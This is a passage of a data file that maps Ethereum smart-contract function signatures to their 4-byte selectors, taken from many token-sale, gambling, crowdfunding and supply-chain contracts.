"0x550b47b8", "calculatePrize(uint256,uint256,uint256)": "0x26e90775", "oneRoll()": "0xa9e2bcfe", "getReportingWindowForForkEndTime()": "0x43951999", "getNextReportingWindow()": "0xb9812d9a", "getCurrentReportingWindow()": "0x6235eef3", "getPreviousReportingWindow()": "0x621bd8d7", "getReportingWindowByMarketEndTime(uint256,bool)": "0xf45392fb", "getReportingWindowByTimestamp(uint256)": "0xa72670b8", "getReportingPeriodDurationInSeconds()": "0x5684c219", "getReportingWindowId(uint256)": "0x1f963f80", "getChildBranch(bytes32)": "0x4c4fa89a", "getReportingWindow(uint256)": "0x90c4ce57", "ownerSetMaxBet(uint256)": "0xbd16deaa", "ownerSetMaxProfitAsPercentOfHouse(uint8)": "0xb3ac7acd", "ownerSetMinJackpoBet(uint256)": "0x4b8f9f87", "ownerSetHouseEdge(uint16)": "0xb9997819", "rand()": "0x3b3dca76", "getHouseEdgeFee(uint256,uint256)": "0xe9c33dfe", "sendValueToJackpot()": "0x0264ba24", "sendJackpot(address)": "0x783b7b1e", "createWinner()": "0x080b3713", "increaseJackpot(uint256,uint256)": "0x08be8700", "sendProportion(address,uint256)": "0x2d9f669d", "oddEven(uint8,address)": "0x0e662ff9", "playerRoll(uint8,uint8,address)": "0x6c1e039a", "revoke(uint256)": "0x20c5429b", "put(address,uint256,uint256,uint256,uint256)": "0x5ca86447", "totalOrder()": "0x216e2a97", "DecentralizedExchangeHotPotato()": "0x66bd6ff6", "SCOOP()": "0xfb77378a", "FastGrowthToken()": "0xbf0e63d7", "setRateIco(uint256)": "0x66648dd3", "TN()": "0xb0a54a76", "AGSCoin()": "0x11b35c48", "GoldConnect()": "0xc867ea63", "withdrawMytoken(uint256)": "0xdfba9798", "MyToken(uint256,string,string)": "0x03e83b6a", "setSaleOngoing(bool)": "0x76ae684d", "setAltDeposits(uint256)": "0x94c475ec", "bonusTokens(uint256)": "0x3c8f96f1", "claimable(address)": "0x402914f5", "updatePoints(address)": "0xc4983c65", "disburse()": "0xabc6fd0b", "XeroBest()": "0x2070748c", "refundMoney(address,address)": "0x60b73223", "refundAllMoney()": "0xe967bb18", "handleFunds()": "0x6d7d083f", "starting()": "0xbe46e9ca", "didSoftCapReached()": "0x1fbd7771", "isWithinTokenAllocLimit(uint256)": "0xc4df310a", "computeTokens(uint256)": "0xaebf1e3d", "isWithinSaleLimit(uint256)": "0x2eb51417", "isWithinSaleTimeLimit()": "0x008bdd13", "forwardAllRaisedFunds()": "0x7e0a16b1", "investorCount()": "0xd7e64c00", "tokenSendFailuresCount()": "0x1f5eeb13", "releaseTokens(address)": "0x87b0be48", "releaseAllTokens()": "0x44fdbf5b", "transferTokenOwnership(address,address)": "0x383fe467", "transferKycOwnerShip(address,address)": "0x3e7bb43c", "setKYCRequiredToSendTokens(bool)": "0xe562f0ec", "setKYCRequiredToReceiveFunds(bool)": "0x6e2e9ee1", "setSaleBonus(uint256)": "0x3c444637", "setKycAddress(address)": "0x7ffe8be1", "setSaleDuration(uint256)": "0x7e12180e", "setSoftCap(uint256)": "0xd5cf5c72", "setTokensForCrowdSale(uint256)": "0xdcc0e622", "setTotalTokens(uint256)": "0xb0b92263", "init(uint256,uint256,address,uint256,address,uint256,uint256,uint256,address,uint256)": "0x085dedf1", "batchAddAddresses(address[])": "0x2cce753a", "removeAddress(address)": "0x4ba79dfe", "isAddressVerified(address,address)": "0x7b8b7364", "mintFinalize(address,uint256)": "0x86f8e4ef", "AirdropToken()": "0x1753d61c", "getAllMyTokensForAllEtherOnContract()": "0x09130f5d", "exitThisIcoForHalfOfTokenPrice()": "0xbf884cf5", "allowIcoExit(bool)": "0xb83520b3", "setCommissions(uint256,uint256)": "0x1feac75b", "setSellCommission(uint256)": "0xbf44aa70", "setBuyCommission(uint256)": "0x12e135a0", "setSellPrice(uint256)": "0xfc6634b9", "setIcosMinLimit(uint256,uint256)": "0x90d22eeb", "STARTMETADOLLAR()": "0x2fd463e1", "returnante(address)": "0x98c0bb94", "returneth(bytes32)": "0x46b7068c", "join_private_room(bytes32)": "0x5b250462", "create_private_room()": "0xb55da874", "pay(uint256,bytes32)": "0x8e6bee97", "update_private_room(bytes32)": "0xebdbd65e", "changeParameters(uint256,uint8,uint256,uint256,uint256)": "0x6bba5c15", "yeezy()": "0xa65491d5", "verifySignature(address,uint256,uint8,bytes32,bytes32)": "0xeb0c9e5a", "computeFinalStake(uint256)": "0xfdbf17d0", "removeHolder(address,uint256)": "0xbd2c0ead", "addHolder(address,uint256)": "0x61f15236", "withdrawExcess()": "0xc264a063", "makeWithdrawal(address,address,uint256,uint256)": "0x74396ed1", "withdrawFor(address,uint256,uint256,uint8,bytes32,bytes32)": "0x061e5844", "withdraw(address,uint256,uint256)": "0xb5c5f672", "unlockWithdrawals(uint256)": "0x6a90ac63", "updateUserShares()": "0x2da39239", "closeCycle(uint256)": "0x3f6fff4e", "startNextCycle()": "0x450e2ed3", "useAsBankroll()": "0xeecb7005", "addDeposit(address,uint256,uint256,uint256)": "0x7224267c", "batchAssignment(address[],uint256[])": "0x34e98037", "deposit(uint256,uint256,uint8,bytes32,bytes32)": "0x7e34dbe0", "setMaxBatchAssignment(uint256)": "0xee1fae7f", "setMinStakingAmount(uint256)": "0x612d669e", "setMaxUpdates(uint256)": "0x90e2160a", "setUpdateGasCost(uint256)": "0x51131017", "setWithdrawGasCost(uint8)": "0xd5353792", "firstStageTotalSupply()": "0xb219c852", "MAX_IMMORTALS()": "0xd4371968", "winningChanseSt()": "0xee298d19", "transferTo()": "0x1ab5d260", "getFeeBurnerAddress()": "0x2d241248", "overrideBlock()": "0x92abb859", "maxContributionPerAddress()": "0xbe9ba97f", "MAX_SPARTANS()": "0xc4b54551", "metToken()": "0x2aafe9e7", "CSE()": "0x7c8db773", "investSum()": "0x7c479343", "donorCount()": "0xc407670f", "initialTokenBalanceFetched()": "0xbb2559ca", "begins()": "0xb304376c", "maxUpdates()": "0x773b5b5e", "BuyBackContract()": "0xebb940e6", "remainingLockDate()": "0x50875b6c", "crowdsaleclosed()": "0xb8435050", "auctusPreSaleAddress()": "0x76922f78", "parentAddress()": "0x00821de3", "Datenow()": "0xf0e231b5", "ETHERAFFLE()": "0xb0b3c9a6", "icoMin()": "0x40f3633e", "_tokePerEth()": "0xd7be503f", "AIRDROP_TOKENS_PERCENT()": "0x4f28c443", "presaleContributorCount()": "0x491274a8", "clock()": "0x91ddadf4", "mintTokensForAdvisors()": "0x72c174db", "mainSaleActive()": "0x25e89283", "rewardEra()": "0x2d38bf7a", "startTimestampOfBonusPeriod()": "0xd9652cb1", "totalDinoSold()": "0x964f8fba", "block1()": "0x0eb524d4", "reserveAllocation()": "0xf8f079bb", "lastSignedBlockNumber()": "0x62694b68", "getDailyPrice()": "0xb5046219", "initilSupply()": "0x5bdf7b4f", "theBid()": "0x8d8d92fa", "fixAmount()": "0x345ac602", "totalDonated()": "0x00b37044", "getServiceFeeDenominator()": "0x239da7de", "gesamtGuthaben()": "0xd33c449f", "levelItemClass()": "0xdd321018", "directorNode()": "0x5a658f6b", "allocate4ProjectToken()": "0xca077f72", "ICO_CAP3()": "0x08bd4d29", "allStop()": "0xecb6c47a", "teamAndAdvisorsAllocation()": "0x645a8570", "nextroundblocksbeforenewpay()": "0xfb3f1fd6", "currentBonusRate()": "0x1d902fe9", "dev4Wallet2Pct()": "0x90427b6c", "dexWallet()": "0x20a17b24", "holderState()": "0xc190b129", "WPXSold()": "0x3713ab41", "periodPREICO()": "0xb448017b", "collectedTokens()": "0x787e9137", "claimProfit()": "0xf011a7af", "Wallet1()": "0x18eeef80", "canonizedPLCR()": "0x5ad22eb3", "lastBlock_a3Hash_uint256()": "0xa43c5415", "eth_ratio()": "0x68e1bba4", "percentageToTeamEthContract()": "0x67cdc1c2", "taker()": "0x782b3602", "isSoftCapHit()": "0x999b078e", "DATE_PRESALE_START()": "0x023bb74d", "_price_tokn_ICO_second()": "0x3e2557c5", "startTimePreIco()": "0xf6cf5411", "newUserRewardPool()": "0xf190b4d3", "TOKEN_SALE_CAP()": "0x90de9ed9", "changePhaseToICOweek3()": "0x8fa366df", "clockmaker()": "0x61719785", "order_counter()": "0xb67d8c69", "minInvestorCap()": "0xf766cd3e", "LastExec()": "0x51ba7534", "organizer()": "0x61203265", "weiUsdExchangeRate()": "0x11fa3f4f", "getNumberOfMinters()": "0x86cd71be", "ownerTokens()": "0xc0aa3b21", "ethToDividendsNeeds()": "0x6b7fad1b", "transferLocked()": "0x12686aae", "board_size()": "0xe0cd6eff", "StartDate()": "0x12bae48d", "BagholderAddr()": "0x72519531", "max_TotalSupply_limit()": "0x8852024f", "augmintReserves()": "0xfe1ebb04", "isIcoStopped()": "0x1039cf3c", "restrictedVault()": "0x75c48942", "priceCents()": "0x282de6b8", "trades()": "0xa6b909e1", "MIN()": "0x37a7f2b7", "foundationTokensVested()": "0xa05d068d", "overflowAmount()": "0x6c7e7082", "addressOfMSF()": "0x649c0b21", "sentTokensToPartner()": "0x5bd26361", "HIGHER_PRICE_RESET_PERCENTAGE()": "0x62dc0133", "tokensPurchased()": "0xcc4d819c", "tokenCreationDate()": "0x5fa44602", "startingCostToPress()": "0x6897a1a2", "ALLOC_WINGS()": "0x6c9e27d6", "finishCrowdCoin()": "0xa0cde1f0", "setOverflowBounds(uint256,uint256)": "0xa0c3bc68", "setDealerCut(uint8)": "0x3b13f8a6", "cashout(address,uint256)": "0xb7b172b3", "BlackjackTipJar()": "0x294247aa", "setMigrateTo(address)": "0x736ec05c", "setMigrateFrom(address)": "0x3a677696", "setOperator(bytes32,bool)": "0x8cb5497c", "setEmployee(address,bytes32,bool)": "0x3ea69d76", "setAssociation(address,bytes32,bytes32)": "0xba873f60", "associationOf(address)": "0xe1af0121", "associate(bytes32,bytes32)": "0x7893d936", "decreaseLock(uint256,uint256,address)": "0xe0b86c53", "increaseLock(uint256,uint256)": "0x5e70a6dc", "lockedEndTimeOf(address)": "0x40bea8d2", "lockedValueOf(address)": "0x68624bd7", "CashBetCoin(uint256)": "0x601ab918", "vacate(address)": "0xdd8a0c56", "oxced()": "0x549caf35", "Elemental()": "0x0adfb4e2", "unfreeze(address)": "0x45c8b1a6", "frozensDetail(address)": "0x3ecb9884", "frozensTotal(address)": "0x242ce07b", "freeze(address,uint256,uint256)": "0x30e1e4e5", "B2ANDcoin()": "0xf7628949", "Sogan()": "0x390576d9", "UblastiToken(uint256,string,string)": "0x597efd85", "Ublasti(uint256,string,string)": "0xbaeeddfc", "FishOne()": "0xf0ef7621", "isSale(address)": "0x7c567bfe", "disablePrivileged()": "0xf450cfee", "thaw()": "0x5920375c", "switchToNextSale(address)": "0x11a10508", "setSale(address,bool)": "0x1019dc59", "BoomstarterToken(address[],uint256)": "0x173e49b7", "KuaiToken(address,uint256)": "0x2c5d0546", "judgeIsReachDailyLimit(uint256,int256,uint256)": "0x0291b9b1", "mint(uint256,int256)": "0xc61e42ae", "KuaiMintableToken(address,uint256)": "0x79e79023", "makeBonus(address[],uint256[])": "0x59802e15", "BonusToken()": "0xe89f38d4", "Operational(address)": "0x5c6224c9", "LottoCount()": "0x7741fc52", "Tardis()": "0x55e17544", "payOrder(uint256,uint256)": "0xd2fbd0ed", "_transferCheck(address,address,uint256)": "0xe90352eb", "Core()": "0x611c7f50", "Burn(uint256)": "0xb90306ad", "ChangeTransferStatus(bool)": "0xf3302a4d", "ChangeCollector(address)": "0x77b1bba6", "MINIPOOLS_LLV_FIFA_1()": "0x395eda08", "endOfRewardsConfirmed(bool)": "0xb4816be9", "endOfRewards(bool)": "0x0ed5410a", "viewCoinSupplyAndFunding(bool)": "0x26423259", "_sendMsgSndr(address,address)": "0x468c17d7", "sendMsgSndr(address,address)": "0x223dad70", "buyCoinsAtExchg(address,uint256,uint256)": "0x072180ff", "buyBkgAtExchg(address,uint256,uint256,uint256)": "0x065361a6", "sellBkgAtExchg(uint256,uint256)": "0x2da09fac", "receiveICOcoins(uint256,uint256)": "0x10271334", "_withdraw(uint256)": "0xac6a2b5d", "burn(uint256,bool)": "0x9fac68cb", "_slrByrLmtChk(address,uint256,uint256,address)": "0xc6c27c71", "_chkBuyerLmtsAndFinl(address,uint256,uint256)": "0xcfd7f1fb", "_chkBuyerLmts(address,uint256)": "0x1b394dce", "_chkSellerLmts(address,uint256)": "0xd532968f", "redeemOrSellCoinsToICO(uint256,uint256)": "0x38131bc5", "_buyCoins(address,uint256)": "0x33b9d3f4", "buyCoinsCrowdSale(address,uint256,address)": "0x49917511", "_safePaymentActionAtIco(uint256,address,uint256)": "0xa7996adc", "_safeTransferPaymnt(address,uint256)": "0xce120afb", "_safeTransferTkn(address,address,uint256)": "0x4053873c", "_getCsAddr()": "0x392603d3", "_getExchgAddr()": "0x197f9508", "_getIcoAddr()": "0xdfd52b74", "setContrAddrAndCrwSale(bool,address,address,address,bool,bool)": "0x9d2044e1", "transferOr(address)": "0x9d3565ce", "TokenMacroansyPower()": "0xdb5b7635", "viewSellOffersAtExchangeMacroansy(address,bool)": "0xf49d1d19", "getExchgComisnMulByThousand()": "0xd5c166d5", "updateSeller(address,uint256,address,uint256)": "0x06d19eb3", "buy_Exchg_BkgChk(address,uint256,uint256,address,uint256)": "0x2524380f", "buy_Exchg_booking(address,uint256,uint256,address,uint256)": "0xeec78546", "sell_Exchg_Reg(uint256,uint256,address)": "0x617c2fb8", "getAvlShares(bool)": "0xd61bd8fb", "getMinBal()": "0x12aa2c0d", "getSCF()": "0xff7b5730", "burn(uint256,bool,uint256,uint256)": "0xfa1ba1e1", "recvShrICO(address,uint256,uint256)": "0xb7df9289", "paymentAction(uint256,address,uint256)": "0xa0e5588a", "sell(uint256,address,bool)": "0x6c7cc6d8", "redeemCoin(uint256,address,bool)": "0xf3f1d909", "buy(uint256,address,bool)": "0x7ad157b9", "LuJiaZuiToken()": "0xc8bc2452", "JJCOIN()": "0xe46537ba", "getBattleCardList(address)": "0x584ed064", "getNormalCardList(address)": "0x9e58ad97", "getBattleCard(address)": "0xd5ba5f82", "getNormalCard(address)": "0x084b410d", "CardsRead()": "0xcc242f40", "unitStealingCapacity(uint256)": "0x6101a1f7", "unlockBonusTokensClaim()": "0x402c569c", "lotteryTokensWallet()": "0xd02bf828", "total_iou_withdrawn()": "0x84605d0d", "feeUnit()": "0x5ff85cc0", "tokensForFight()": "0x86e37ae7", "minerLockTime()": "0x95275e5e", "minimumContributionPhase1()": "0x9e962b39", "candySentAmount()": "0x7ef039f8", "tenDecimalPlaces()": "0x2ae26d8e", "weekTwoRate()": "0xfbaa0ece", "priceUpdater()": "0xfc612a8d", "totalTokensReserve()": "0x472fdb67", "PRESALE_LIMIT()": "0x1aee3f91", "arbitrationWallet()": "0x7704533d", "MIN_FUNDING_GOAL()": "0x36d95f56", "baseIcoPrice()": "0x4587501e", "pubsaleRate()": "0x365c81fb", "pricesAreStale()": "0x3d160de9", "TestIssued()": "0x8c343aee", "isCrowdsaleOver()": "0x5b4a54a9", "ethereumForkArbiter()": "0xea490b84", "ico_startTime()": "0xaf604173", "developReserveAllocation()": "0x39b55e74", "buyfloaksAgainstEther()": "0xdbf14dd9", "burnPercentage()": "0xf01f20df", "STARTING_LOBSTER()": "0x8b2e31dc", "checkMaxCapReached()": "0x90f4d2fd", "priceLastUpdate()": "0xde28431c", "share()": "0xa8d5fd65", "crowdSaleEndTime()": "0x18e3d998", "GIRLBUFFERSIZE()": "0x689e87c1", "tokenForTeamGranted()": "0xc855e7bb", "bitcoin_multisig_vault()": "0xe85ca2a4", "saleComplete()": "0x811a0a85", "getTransferCount()": "0x040e55f5", "hommie()": "0xfef88502", "TOTAL_SUPPLY_VALUE()": "0x78f5e59f", "minGasPrice()": "0xd96ed505", "lastBlock_f14()": "0xd15376a7", "teFoodsAddress()": "0x8418dc36", "ICOAddress()": "0xd2f1f189", "GetQueueLength()": "0x10f32982", "requiredGoldIncreaseFactor()": "0x6a7882f2", "presaleWeiRaised()": "0xf7c00e2f", "devAddress()": "0x3ad10ef6", "developmentToken()": "0xb020b188", "teamUnfreeze()": "0xdcdda6d7", "withdrawnByBeneficiary()": "0x3e05c964", "arconaToken()": "0x29d592bf", "tokenAllocToCompany()": "0xa33c0972", "managementBodyAddress()": "0xba0bface", "charityWalletAddress()": "0xec271be2", "TOTAL_MIND_TOKEN_SUPPLY()": "0xeed47127", "BNB_TOKEN_PRICE_NUM()": "0x6217903f", "pIndex()": "0x8d5c4456", "dteamVaultAddr3()": "0x0461ac58", "transferredIndex()": "0x2757e976", "attackerExpAdjustment()": "0x13c10e44", "getAssets()": "0x67e4ac2c", "calculateTierBonus()": "0x6595c94e", "gambler1()": "0xcee24e31", "MEGA_HERO_MULTIPLIER()": "0x725a7eea", "StatsMinted()": "0xe8436936", "fundRepository()": "0x36600999", "currentWeight()": "0x32b85a44", "endICOStage4()": "0xf0c99750", "midnight()": "0x7372014e", "canMintBurn()": "0x1f6eeb68", "VINEYARD_ADDRESS()": "0xf0b01d56", "lockupSeconds()": "0x79049227", "marketAnts()": "0x0d1352cf", "totalScammedQuantity()": "0xf9cee7b5", "loveName()": "0x92760a3e", "startPreico()": "0x31859556", "numBallots()": "0x4beb031b", "bitsMask()": "0x2109b408", "NUM_TILES()": "0x4d0b2a29", "DONATION_RATE()": "0x95438548", "weiMaximumGoal()": "0x5506aa6c", "AllowTransferExternal()": "0x286362f8", "prometheusVoucherSoldCount()": "0x2d9c6001", "amountOfTokensPoolC()": "0xa159c548", "fundDeposit()": "0x6caa736b", "accountPubICOSale()": "0x29569e80", "eTicket()": "0xd5bf4da1", "lockOwner()": "0x69cd61be", "halting()": "0xa1bb6220", "withdrawalsAllowed()": "0x4843b358", "tokenDestroyed()": "0xd9aa1881", "tradingOpen()": "0xffb54a99", "bounty_allocation()": "0x2a795d79", "withdrawBalanceAll()": "0x19287f3a", "ringhashRegistryAddress()": "0xd21b96ab", "firstUnlockTime()": "0x1db0ad5a", "regularMinPerPerson()": "0x677bcb89", "monsterFleeTime()": "0x02e1033a", "ethVest()": "0xc76c9269", "personalCapActive()": "0x8a34396a", "requestCount()": "0x5badbe4c", "getreward()": "0x6f8e0a08", "AutoCoinICO(uint256,uint256,uint256,address)": "0x00c90ac8", "transferAirdropTokens(address[],uint256[])": "0x283ba681", "AutoCoinToken()": "0x97a6ef4a", "privateSaleTokens(uint256,uint256)": "0x7dfe4302", "BTHB()": "0xb9a6f7b0", "DifToken(uint256,string,uint8,string)": "0x79c36409", "HARITECOIN()": "0x7523a46e", "Bitceun()": "0x7d309331", "close(bool)": "0x212c5fea", "assignRaffleWinner(address)": "0x7bb55287", "startTokenRaffle(uint256,address,uint256,bool)": "0xa78488af", "setIcoDates(uint256,uint256,uint256,uint256,uint256)": "0xb734cbba", "contractBalanceOf(address)": "0x8481573e", "KcashToken()": "0xb0062595", "pledgeEth(uint256)": "0x0e468245", "redistributeEthForAddresses(uint256,address[])": "0xde6bd0e8", "reclaimEth(uint256)": "0xbe9b3e8a", "distributeSuccessfulCampaignEth(uint256)": "0xacfd35a0", "makeProposal(string,uint256,uint256,uint256,uint256,address)": "0x95a6f9ab", "ethercrowdfund()": "0xf076ba9c", "BlueChainToken()": "0xf322a1cf", "UniBowToken()": "0x7f9d2044", "EthereumCashPro()": "0xa362858a", "winner(uint256)": "0x1cbeae5e", "winner(uint256,bytes32)": "0x9cefa50b", "updatePaid(address,address,uint256)": "0x0d349aea", "thisBalance()": "0x27f3a72a", "collectDividends(address)": "0xc93ceec8", "ICOaddress(address)": "0x0141e90a", "ICOTimer()": "0x44b76b9e", "bonusInfo()": "0xc926435c", "buyEIT()": "0xdddfb2f2", "invested()": "0xcafb2202", "Ethernational()": "0xf2e6fecd", "dividendsAcc(address)": "0x32c716b6", "changeBrokerImp(address)": "0xc919992d", "BrokerInt(address)": "0xac72cd7e", "FileCoinCash()": "0xc85ee477", "TEHToken()": "0xd5b36eeb", "CryptolifeToken()": "0x19638ca5", "AGC()": "0x4ee3659d", "EderCoin()": "0xfd0aeb34", "PanamavsTunisia()": "0xadff5f36", "changeSpender(address)": "0x6c5541b5", "updateAllowance()": "0xf40d8d8f", "setUpAllowance()": "0x397986a1", "Allowance()": "0x7040f3e5", "TokenPool(address,address)": "0x8d2dcb2d", "SOLEToken(address,uint256)": "0x838f0602", "getAnimecard(uint256)": "0x2a4654ab", "AnimecardCore()": "0xe191548d", "createAnimecard(string,string,string,string,uint256)": "0x0769aefa", "computePayment(uint256,uint256)": "0x2784ad48", "computeNextPrice(uint256)": "0x35c23200", "setPlatformFee(uint256)": "0x12e8e2c3", "_createAnimecard(string,string,string,string,uint256,address)": "0x745e77f9", "setAnimator(address)": "0x609b8394", "tokensUnsold()": "0xba982c41", "getRateAndCheckCap()": "0xca0781a1", "MTC()": "0x2c5104f5", "setDestructionCurator(address)": "0xf14dc176", "DestructionContract()": "0xd2e78ace", "_recalculateAirdrop(address)": "0x5ab50913", "isAirdrop(address)": "0x74acb5d6", "addAirdrop(address,uint256)": "0x63665f2e", "setSiteAccountAddress(address,address)": "0x361f10e5", "_airdropUnlocked(address)": "0xecf7b873", "_issueTokens(address,uint256)": "0xabf74cda", "GetStakingNow()": "0x78dbce5f", "getRequirementTime(address)": "0xff67c9f5", "getStakingRequirementTime(address,uint256)": "0xa9d04bd8", "LBQ(uint256,string,string)": "0xea8466dc", "CoinLLeague()": "0x95be7542", "EURSToken(address)": "0xbc7d8cb4", "BIRC()": "0x58fe8847", "BToken()": "0x6d9814e1", "freeze(address,address,bool)": "0x592311ed", "SmartToken(string,string)": "0x408d947e", "Visualrocktoken()": "0x4aa77c71", "NAMINORI()": "0xcc2aa2c7", "CHW()": "0x5579996d", "EtherCashPay(address,address,address,uint256,uint256,uint256)": "0xf2ba478d", "unlockGrant()": "0x4438744b", "revokeGrant(address)": "0x1817c5a7", "createGrant(address,uint256,uint256)": "0xdde26ec9", "changeVestingAgent(address)": "0xfc7b78b1", "LianPaiToken()": "0x3691125a", "ELIX()": "0x9498fb26", "setWorstCaseRateFactor(uint256)": "0xdcb46e38", "TPS()": "0x6e094b67", "SKYSWAP()": "0x61d51df8", "setAdminAddress(address,address)": "0x85e9bd2b", "EgyptianPound()": "0xdd604fcb", "multipleTokenDistribute(address,address[],uint256[])": "0x806f3319", "GBIToken(uint256,string,string)": "0xe0299621", "CryptrustToken()": "0xf37b0427", "isInTimeRange(uint256,uint256)": "0x72801b53", "CoinparkToken()": "0x111b63ab", "ZJZJToken()": "0x2153bade", "changePool(address)": "0x4339bc30", "finalizeReclaim(uint256)": "0x07d86788", "finalizeTransferChild(uint256)": "0x4d36dd87", "requestNameChange(string,string)": "0x66c2355c", "requestDelegatedFrom(address)": "0x1eb3957b", "requestChangeStaker(address)": "0x7269daa5", "requestChangeStakingFees(uint80,uint80,uint80,int256,uint80,int256,uint256,int256,uint80,uint80,uint256)": "0x5a94cd0c", "requestChangeBurnBounds(uint256,uint256)": "0x2692281d", "TimeLockedController(address)": "0xd922d5c8", "computeDeferBlock()": "0xe0a3e7ec", "FBI()": "0x7bb4493c", "rerollValue(uint256)": "0xda9f84a6", "Token10xAmin()": "0xed15c31d", "balance(bytes32,string,address)": "0x956a2d03", "amountFunded(bytes32,string,address,address)": "0x3ac4aeeb", "getFunderByIndex(bytes32,string,uint256)": "0x5eecbad8", "getFunderCount(bytes32,string)": "0x15f2e1bf", "getFundedTokensByIndex(bytes32,string,uint256)": "0x3d725831", "getFundedTokenCount(bytes32,string)": "0xb4d168f7", "issueResolved(bytes32,string)": "0xf5a486f3", "getFundInfo(bytes32,string,address,address)": "0xe82cc47f", "finishResolveFund(bytes32,string)": "0x474448c4", "claimToken(bytes32,string,address)": "0x36e4f915", "updateBalances(address,bytes32,string,address,uint256)": "0x844c7d95", "updateFunders(address,bytes32,string)": "0x9f819b13", "TMN()": "0xd83fcfa3", "signWithdraw(address,address)": "0x2e9be9d5", "nextStage(bool)": "0x8ffb4dc7", "getTokensAmount(uint256,address)": "0xc0963d97", "vestTo(address,uint256)": "0xbacc2753", "vest2all(address,address)": "0xa67afd30", "vest2mlDevelopers(address,address)": "0xc1758fee", "send2marketing(address,address)": "0xc405d30e", "vest2advisors(address,address)": "0x2e4054cf", "vest2team(address,address)": "0xd6e898ad", "getReserve()": "0x59bf5d39", "sendUnsold(address,uint256)": "0xc9cfe755", "getShare()": "0x75298734", "releasedTo(address,address)": "0x075a3b57", "vestedTo(address,address)": "0xa1344589", "LZZ()": "0x8d0d877f", "CTGToken()": "0xd1f38097", "getEtherForTokens(uint256,uint8)": "0x3ea556da", "getTokensForEther(uint256,uint8)": "0x00af4274", "reserve(uint8)": "0xf11ef5cf", "sell(uint256,uint8)": "0x673f3807", "balance(uint8)": "0xef47ff4b", "dividends(address,uint8)": "0x29e846df", "sellPrice(uint8)": "0x79a4b4bd", "buyPrice(uint8)": "0x4d07b23d", "fund(uint8,uint8,uint8)": "0xd7f0f01b", "sellMyTokensAmount(uint8,uint256)": "0x6f1e54c3", "sellMyTokens(uint8)": "0xa12842cc", "withdrawOwnerFee()": "0x3c96a7a8", "withdraw(uint8)": "0xc6ab5d90", "balanceOf(address,uint8)": "0x67412045", "EtherPaint()": "0x7453cfa1", "QuranToken()": "0x0ec852f2", "getMappingID(string,address,address)": "0xb54f24a9", "startProduct(string,string,string,int256)": "0xa584d8cc", "startWinery(string,string,string,uint256)": "0xca6cf796", "startWineryProductByRegulator(string,string,string,string,int256)": "0xb0dc63eb", "WineSupplyChain(address)": "0xb25302f6", "getWineryMappingID(string,string)": "0x884095f6", "bindSmartIdentityByRegulator(string,string,string)": "0x84d62f47", "bindSmartIdentity(string,string)": "0x11c0f931", "SmartBinding()": "0xfccf5a68", "isDeprecated()": "0xc7178230", "setDeprecated(address,string,string)": "0x3fcce626", "addVineyard(bytes32,uint16,uint24,uint32,uint16)": "0x8e6ff99a", "storeHarvestOperation(bytes32,address,string,string,uint32,uint24,uint16,string)": "0xaed339ef", "getVineyardCount(string,address)": "0x9b71dec3", "getVineyard(string,address,uint256)": "0xab5f3380", "getHarvestOperation(string,address)": "0xb241b3b5", "addVineyardByRegulator(string,string,uint16,uint24,uint32,uint16)": "0x750732ec", "storeHarvestOperationByRegulator(string,string,string,uint32,uint16,uint16,string)": "0xc1ef098b", "addVineyard(string,uint16,uint24,uint32,uint16)": "0x73a75c1f", "storeHarvestOperation(string,string,uint32,uint16,uint16,string)": "0xe8aa377b", "ProducerOperations()": "0x815c326d", "getNumWineryOperation(bytes32)": "0xa0cfc196", "getNumPositionProduct(bytes32,uint8,string)": "0x9b6687ac", "getNumChildOperation(bytes32,uint8)": "0x09ad8f7e", "getChildOperation(bytes32,uint8,uint8)": "0xcad1c663", "getNumParentOperation(bytes32,uint8)": "0xcbbf879c", "getParentOperation(bytes32,uint8,uint8)": "0x8ba64328", "addRelationshipBindingWineryOperation(bytes32,uint256,bytes32,int256)": "0xdcc66b4b", "addProduct(bytes32,uint256,string,string,string)": "0xb18af4e3", "addWineryOperation(bytes32,address,string,string,string,uint256,uint16,string)": "0x346f8827", "getNumPositionOperation(string,address,string)": "0x45624260", "getProductOperation(string,address,uint256,uint256)": "0x0eb51018", "getWineryOperation(string,address,uint256)": "0x6eabb2f6", "addReferenceParentWineryOperationByRegulator(string,string,uint256,string,string,int256)": "0x12de8a12", "setProductAttributesByRegulator(string,string,uint256,uint256,string)": "0x1c638376", "setOperationAttributesByRegulator(string,string,uint256,string)": "0x21cbed35", "addProductByRegulator(string,uint256,string,string,string,string)": "0xcd22f536", "addWineryOperationByRegulator(string,string,string,string,uint256,uint16,string)": "0x0db79003", "setProductAttributes(string,uint256,uint256,string)": "0x00ba3e50", "setOperationAttributes(string,uint256,string)": "0x1c566ef2", "addReferenceParentWineryOperation(string,uint256,string,address,int256)": "0x887bae74", "addProduct(string,uint256,string,string,string)": "0x02879f9c", "addWineryOperation(string,string,string,uint256,uint16,string)": "0xd36dbc0c", "setMINfinney(uint256)": "0x7b7a43eb", "setAIRDROPPrice(uint256)": "0x7d47b4e7", "calculateObtained(uint256)": "0x011db570", "APB()": "0x363ef9dc", "getDeveloperReservedLockInfo(uint256)": "0xf6988b79", "changeUnlockTime(uint256,uint256)": "0xaad71040", "getDeveloperReservedBalanceLimit()": "0xc0efa161", "GREENBIT()": "0x5151e2cc", "SLOTS()": "0x9696ef66", "cancelDeal(uint256)": "0x31ea1a39", "finishDeal(uint256)": "0xa99da6af", "finishSign(uint256)": "0x9b16250a", "refound(uint256)": "0xfcc4dec9", "signAgency(uint256)": "0xd30272b8", "signSeller(uint256)": "0x06a5f087", "signBuyer(uint256)": "0x5030c325", "addDeal(address,address,address,uint256,uint256,uint256,uint256,string,uint256)": "0x4327acda", "getDealDataByNumber(uint256)": "0x4b3c45db", "getDealById(uint256)": "0x0aba73d7", "getDealsLength()": "0xeddfcffa", "getDealByNumber(uint256)": "0xf4bbd5d4", "getSigns(uint256)": "0xa6f7257a", "changeDealDate(uint256,uint256)": "0x63176ad9", "changeAgencyReceiver(address)": "0x6fc39a38", "changeAgencyOwner(address)": "0x564e406f", "setBalances(address[],address,uint256[])": "0x51f6d8c6", "authenticate(uint256,uint256,uint256)": "0x053011b7", "setRaindropAddress(address)": "0xb302ea1e", "YoloToken()": "0x77f6f7e8", "authenticate(address,uint256,uint256,uint256)": "0xc68ae617", "tokenCallback(address,uint256,bytes)": "0x6be32e73", "checkTransferMultipleDelegated(address,address[],uint256[],uint256,uint256,bytes)": "0x4a1ad538", "checkTransferAndCallDelegated(address,address,uint256,bytes,uint256,uint256,bytes)": "0x923de8e2", "checkTransferDelegated(address,address,uint256,uint256,uint256,bytes)": "0x27a69644", "transferLike(address,uint256)": "0x4fee5360", "registerKYC(address[])": "0xcdf4d6b4", 